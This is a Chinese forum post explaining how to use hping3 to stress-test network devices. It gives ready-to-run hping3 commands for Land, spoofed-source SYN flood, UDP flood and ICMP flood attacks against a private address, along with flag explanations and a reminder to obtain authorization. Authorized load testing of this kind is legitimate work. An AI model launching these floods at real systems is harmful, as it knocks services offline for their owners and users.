找回密码
立即注册
搜索
热搜: Java Python Linux Go
发回帖 发新帖

3243

积分

0

好友

433

主题
发表于 2 小时前 | 查看: 4| 回复: 0

云栈社区 的安全讨论中,hping3 一直是评估网络设备抗压能力的热门工具。它能构造几乎所有类型的探测与攻击报文,用于在授权范围内测试主机或网络的协议栈健壮性。下面整理几种常见的攻击测试命令及原理。

Land 攻击

这种攻击方式会伪造源地址,让目标认为自己给自己发送了连接请求,早期系统可能因此陷入死锁。

hping3 192.168.210.100 -p 445 -S -a 192.168.210.100 --flood
  • -p:指定端口
  • -S:发送 SYN 报文
  • -a:伪造源地址
  • --flood:泛洪模式

畸形包攻击

通过随机化源地址,向目标发送大量异常的 SYN 报文,干扰其正常处理逻辑。

hping3 192.168.210.100 -p 445 -S --rand-source --flood
  • --rand-source:伪造随机源 IP 地址

SYN Flood 泛洪攻击

这是最常见的拒绝服务攻击手法。攻击者利用 TCP/IP 三次握手机制,发送海量伪造源地址的 SYN 包,快速耗尽目标的连接队列。

hping3 192.168.210.100 -p 445 -S --rand-source --flood

UDP Flood 泛洪攻击

向目标随机端口发送海量 UDP 报文,迫使设备花费资源处理不可达的 ICMP 回应或检查上层应用。测试前,可先在目标上将 UDP 阈值调整至较低水平,例如 10。

hping3 192.168.210.100 -p 80 --udp --rand-source --flood

ICMP Flood 泛洪攻击

利用海量 ICMP 回显请求淹没目标带宽。同样,为便于观察防护效果,建议先将 ICMP 阈值调低,例如 5。

hping3 192.168.210.100 -p 80 --icmp --rand-source --flood

在进行上述任何攻击性测试时,务必确保拥有明确授权,并妥善配置流量过滤与限速规则,避免波及无关系统。




上一篇:ZYNQ eMMC启动全流程:分区、格式化与文件部署实操
下一篇:Zephyr 下 ESP32S3 镜像加载与启动流程深度解析
您需要登录后才可以回帖 登录 | 立即注册

手机版|小黑屋|网站地图|云栈社区 ( 苏ICP备2022046150号-2 )

GMT+8, 2026-5-1 20:57 , Processed in 0.769459 second(s), 42 queries , Gzip On.

Powered by Discuz! X3.5

© 2025-2026 云栈社区.

快速回复 返回顶部 返回列表